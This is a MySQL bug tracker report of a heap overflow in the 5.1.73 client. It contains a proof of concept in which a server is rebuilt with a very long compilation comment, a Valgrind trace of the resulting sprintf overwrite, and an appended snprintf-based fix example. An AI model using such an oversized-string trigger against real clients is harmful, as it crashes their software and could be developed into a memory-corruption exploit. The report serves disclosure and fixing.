Bug #77046 the Vulnerability in mysql client 5.x (windows)
Submitted: 15 May 2015 6:14
Modified: 30 Dec 2015 11:38
Reporter: doggy doggy
Status: Can't repeat
Category: MySQL Server: Compiling
Severity: S3 (Non-critical)
Version: 5.x
OS: Windows (windows7 x84)
Assigned to:
CPU Architecture: Any

[15 May 2015 6:14] doggy doggy
Description:
Hello,
 Here, I found a vulnerability in mysql client.
 I edited the source code of mysqld. Here is the POC.

file: mysql-5.1.73\include\mysql_version.h

/* Copyright (c) 1996, 1999-2004, 2007 MySQL AB
   This file is public domain and comes with NO WARRANTY of any kind */
 
/* Version numbers for protocol & mysqld */
 
#ifndef _mysql_version_h
#define _mysql_version_h
#ifdef _CUSTOMCONFIG_
#include <custom_conf.h>
#else
#define PROTOCOL_VERSION	10
#define MYSQL_SERVER_VERSION	"55.1.73"
#define MYSQL_BASE_VERSION	"mysqld-55.1"
#define MYSQL_SERVER_SUFFIX_DEF	"-pro"
#define FRM_VER	6
#define MYSQL_VERSION_ID	50173
#define MYSQL_PORT	3306
#define MYSQL_PORT_DEFAULT	0
#define MYSQL_UNIX_ADDR	"MySQL"
#define MYSQL_CONFIG_NAME	"my"
#define MYSQL_COMPILATION_COMMENT	"Source distributionAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
 
/* mysqld compile time options */
#endif /* _CUSTOMCONFIG_ */
 
#ifndef LICENSE
#define LICENSE	GPL
#endif /* LICENSE */
 
#endif /* _mysql_version_h */

And recompiled. Then I used mysql client to connect to the server, and I found it crashed.

How to repeat:
By recompiling the mysql server, and using mysql client to connect to it.
[4 Sep 2015 8:39] MySQL Verification Team
Hello!

Thank you for the report.
I'm not seeing this issue with 5.5/5.6 builds.
Could you please confirm from your end with 5.5/5.6? If you can provide more information, feel free to add it to this bug and change the status back to 'Open'.

Thank you for your interest in MySQL.

Thanks,
Umesh
[30 Dec 2015 15:55] MySQL Verification Team
5.5, 5.6, 5.7, 5.8 clients weren't affected.
5.1.73 client encountered this:

[q@q mysql-5.1.73-linux-x86_64-glibc23]$ valgrind --db-attach=yes ./bin/mysql -uroot
==24513==
==24513== Warning: --db-attach is a deprecated feature which will be
==24513==    removed in the next release. Use --vgdb-error=1 instead
==24513==
==24513== Memcheck, a memory error detector
==24513== Copyright (C) 2002-2013, and GNU GPL'd, by Julian Seward et al.
==24513== Using Valgrind-3.10.0 and LibVEX; rerun with -h for copyright info
==24513== Command: ./bin/mysql -uroot -h192.168.1.1
==24513==
Welcome to the MySQL monitor.  Commands end with ; or \g.
==24513== Invalid write of size 1
==24513==    at 0x4C3075C: __GI_mempcpy (in /usr/lib64/valgrind/vgpreload_memcheck-amd64-linux.so)
==24513==    by 0x5A53548: _IO_default_xsputn (genops.c:464)
==24513==    by 0x5A22A4C: vfprintf (vfprintf.c:1635)
==24513==    by 0x5A4897A: vsprintf (iovsprintf.c:42)
==24513==    by 0x5A2BD46: sprintf (sprintf.c:32)
==24513==    by 0x4441D0: main (mysql.cc:1172)
==24513==  Address 0x63cba78 is 0 bytes after a block of size 520 alloc'd
==24513==    at 0x4C29BFD: malloc (in /usr/lib64/valgrind/vgpreload_memcheck-amd64-linux.so)
==24513==    by 0x471B41: my_malloc (my_malloc.c:37)
==24513==    by 0x44535B: String::realloc(unsigned int) (sql_string.cc:79)
==24513==    by 0x4440F6: main (mysql.cc:1148)
==24513==

Let us know if you can repeat the problem using 5.5 or newer client.
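
Added example, not part of the original bug report and not MySQL source code: the Valgrind trace above shows sprintf() writing past a 520-byte heap block while the client prints its welcome text. The sketch below measures what an unbounded sprintf() would write for a long server-supplied string and formats the same text with a bounded snprintf() that reports truncation. The format string, function names and the 2000-byte sample comment are assumptions made for illustration; only the 520-byte size comes from the trace.

```c
#include <stdio.h>
#include <string.h>

#define BANNER_CAP 520   /* block size reported in the Valgrind trace */
#define BANNER_FMT "Connection id: %lu\nServer version: %s %s\n" /* assumed */

/* Bytes (including the NUL) an unbounded sprintf() would write.
   snprintf(NULL, 0, ...) only measures; it stores nothing. */
static size_t banner_needed(unsigned long id, const char *ver, const char *cmt)
{
    int n = snprintf(NULL, 0, BANNER_FMT, id, ver, cmt);
    return n < 0 ? 0 : (size_t)n + 1;
}

/* Bounded form: writes at most cap bytes and always NUL-terminates.
   Returns 0 if everything fit, 1 if truncated, -1 on error. */
static int format_banner(char *dst, size_t cap, unsigned long id,
                         const char *ver, const char *cmt)
{
    int n;
    if (dst == NULL || cap == 0)
        return -1;
    n = snprintf(dst, cap, BANNER_FMT, id, ver, cmt);
    if (n < 0) {
        dst[0] = '\0';
        return -1;
    }
    return (size_t)n >= cap ? 1 : 0;
}

/* Constructed input: a compile comment of `len` 'A' bytes, standing in
   for the oversized MYSQL_COMPILATION_COMMENT in the report. */
static int demo(size_t len, size_t *needed, size_t *written)
{
    static char comment[4096];
    char banner[BANNER_CAP];
    int rc;
    if (len >= sizeof comment)
        len = sizeof comment - 1;
    memset(comment, 'A', len);
    comment[len] = '\0';
    *needed = banner_needed(1, "55.1.73-pro", comment);
    rc = format_banner(banner, sizeof banner, 1, "55.1.73-pro", comment);
    *written = strlen(banner) + 1;   /* bytes actually stored */
    return rc;
}

int main(void)
{
    size_t need, wrote;
    int rc = demo(2000, &need, &wrote);
    printf("needed=%zu cap=%d written=%zu truncated=%d\n",
           need, BANNER_CAP, wrote, rc);
    return 0;
}
```

A caller that sees a truncation result can either grow the buffer to the measured size or reject the oversized server string, instead of letting the write run past the allocation.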